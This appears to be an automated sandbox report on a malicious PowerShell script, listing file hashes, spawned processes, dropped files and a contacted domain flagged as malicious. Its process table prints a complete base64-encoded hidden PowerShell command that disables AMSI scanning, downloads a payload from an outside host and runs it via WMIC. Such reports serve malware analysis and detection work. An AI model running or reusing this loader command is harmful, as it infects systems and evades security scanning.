File name: | test_script.ps1 |
Full analysis: | https://app.any.run/tasks/a5168f4a-887e-4b06-b195-0e9ffb6faf5b |
Verdict: | Malicious activity |
Analysis date: | December 02, 2019, 21:45:04 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | C9697407467363FA7BDF77D72C152870 |
SHA1: | 4DFAC1B0FEB0A87FD0CA33643843DE16DDE4C5BB |
SHA256: | AB124E4F4AE086BA0EA124E2ABD1E19BBF34B69222B6D4285BF457CA8F9AA62D |
SSDEEP: | 48:HL7Ht9SEi1Xr70i9x9WI1RFi+ckrjpRqusHf2If8A+hyt0hUG:HLL3SEkr31j1/bfpRqu+Ohyt0hUG |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1560 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\AppData\Local\Temp\test_script.ps1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3980 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -enc dAByAHkAewAkAGwASQBsADEAbABsAGwASQA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQA7ACQASQBsAGwAbABsADEAPQAkAGwASQBsADEAbABsAGwASQAuAEcAZQB0AFQAeQBwAGUAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVQAzAGwAegBkAEcAVgB0AEwAawAxAGgAYgBtAEYAbgBaAFcAMQBsAGIAbgBRAHUAUQBYAFYAMABiADIAMQBoAGQARwBsAHYAYgBpADUAQgBiAFgATgBwAFYAWABSAHAAYgBIAE0APQAnACkAKQApADsAJABJADEAMQAxADEAMQBJAEkAPQAkAEkAbABsAGwAbAAxAC4ARwBlAHQARgBpAGUAbABkACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFkAVwAxAHoAYQBVAGwAdQBhAFgAUgBHAFkAVwBsAHMAWgBXAFEAPQAnACkAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAkAEkAMQAxADEAMQAxAEkASQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACQAdAByAHUAZQApADsAfQBjAGEAdABjAGgAewB9ADsAJABsAEkAbABJAGwAbAA9ACIAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwATABvAHcAXAAkACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwApACsAKAA2ADUALgAuADkAMAApACsAKAA5ADcALgAuADEAMgAyACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4AHwAJQB7AFsAYwBoAGEAcgBdACQAXwB9ACkAKQAuAHQAbQBwACIAOwAkAGwASQBJAGwAbABJAGwAMQAxAEkASQBsAD0AJwBoAHQAdABwAHMAOgAvAC8AdABvAHIAYwBoAGwAaQBmAGUANAB1AC4AYwBvAG0ALwBBAG4AYQB0AGkAcgBhAC0AZQBhAHIAbgBmAHUAbAAtADUANQA1ADgALwA4ADcANAA0AC0AMwAzADMANQAtADYAOQA5ADgAPwBaAHYAeQA9AEgAaQBzAHQAcgBpAG8AJgBTAHUAbABmAG8AbgB5AGwAcwA9ADcAOAAxADUAJwA7AFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBKAEcATgBzAGEAVAAwAG8AVABtAFYAMwBMAFUAOQBpAGEAbQBWAGoAZABDAEIATwBaAFgAUQB1AFYAMgBWAGkAUQAyAHgAcABaAFcANQAwAEsAVABzAGsAWQAyAHgAcABMAGsAaABsAFkAVwBSAGwAYwBuAE4AYgBKADEAVgB6AFoAWABJAHQAUQBXAGQAbABiAG4AUQBuAFgAVAAwAG4AUgBsAHAAVwBTAGoAUgBpAE4ARQAxAFMAUwAyAFUAMwBZAGsATgBVAFEAaQBjADcASgBHAE4AcwBhAFMANQBFAGIAMwBkAHUAYgBHADkAaABaAEUAWgBwAGIARwBVAG8ASgBHAHgASgBTAFcAeABzAFMAVwB3AHgATQBVAGwASgBiAEMAdwBrAGIARQBsAHMAUwBXAHgAcwBLAFQAcwA9ACcAKQApAHwAaQBlAHgAOwB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQB7AHQAcgB5AHsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgB3AG0AaQBjACIAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBwAHIAbwBjAGUAcwBzACAAYwBhAGwAbAAgAGMAcgBlAGEAdABlACAAJABsAEkAbABJAGwAbAAiACAALQBWAGUAcgBiACAAUgB1AG4AYQBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA7AH0AYwBhAHQAYwBoAHsAYwBvAG4AdABpAG4AdQBlADsAfQA7AGIAcgBlAGEAawA7AH0AOwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
332 | "C:\Windows\System32\Wbem\WMIC.exe" process call create C:\Users\admin\AppData\LocalLow\9qC4lZpR.tmp | C:\Windows\System32\Wbem\WMIC.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1560 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7URRWSWY87D4A3XAAQAY.temp | — | |
MD5:— | SHA256:— | |||
3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W5LV8BG9RF61CS2X4JW9.temp | — | |
MD5:— | SHA256:— | |||
3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b8ac.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1560 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1560 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b57f.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3980 | powershell.exe | 46.101.140.152:443 | torchlife4u.com | Digital Ocean, Inc. | DE | malicious |
Domain | IP | Reputation |
---|---|---|
torchlife4u.com |
| malicious |
dns.msftncsi.com |
| shared |